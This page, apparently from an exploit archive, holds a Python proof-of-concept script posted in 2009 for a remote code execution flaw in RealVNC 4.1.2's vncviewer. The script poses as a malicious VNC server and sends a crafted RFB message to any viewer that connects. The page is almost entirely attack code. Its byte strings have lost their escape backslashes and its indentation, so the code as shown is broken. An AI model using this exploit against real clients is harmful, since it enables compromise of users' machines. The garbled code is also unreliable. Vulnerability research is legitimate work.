realvnc-exec.txt

Posted on 02 February 2009
#!/usr/bin/env python
# POC: RealVNC 4.1.2 'vncviewer.exe' RFB Protocol Remote Code Execution Vulnerability, BID 30499
#Author: Andres Lopez Luksenberg <polakocai@gmail.com>
#
import socket

serversocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
serversocket.bind(('', 5900))
serversocket.listen(1)

while True:
clientsocket, clientaddres = serversocket.accept()

data = 'RFB 003.008
'
clientsocket.sendall(data)

data_cli = clientsocket.recv(1024)
print data_cli

data = 'x01x01'
clientsocket.sendall(data)

data_cli = clientsocket.recv(1024)
print repr(data_cli)

data = 'x00x00x00x00'
clientsocket.sendall(data)

data = 'x02xd0x01x77x08x08x00x00x00x07x00x07x00x03x00x03x06x00x00x00x00x00x00x13x4cx69x6ex75x78x56x4ex43x3ax20x2fx64x65x76x2fx74x74x79x32'

clientsocket.sendall(data)

data_cli = clientsocket.recv(1024)
print repr(data_cli)

data_cli = clientsocket.recv(1024)
print repr(data_cli)

data_cli = clientsocket.recv(1024)
print repr(data_cli)

data='x00x00x00x03x00x03x00x03x00x08x00x07'

data = data + 'x00x00xffxff' #bug

data = data + 'x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00xe7xe7x7ex3cx7exe7xe7'

clientsocket.sendall(data)

clientsocket.close()
serversocket.close()
TOP
Malware :

None in database
Last 20
Exploits :

Last 20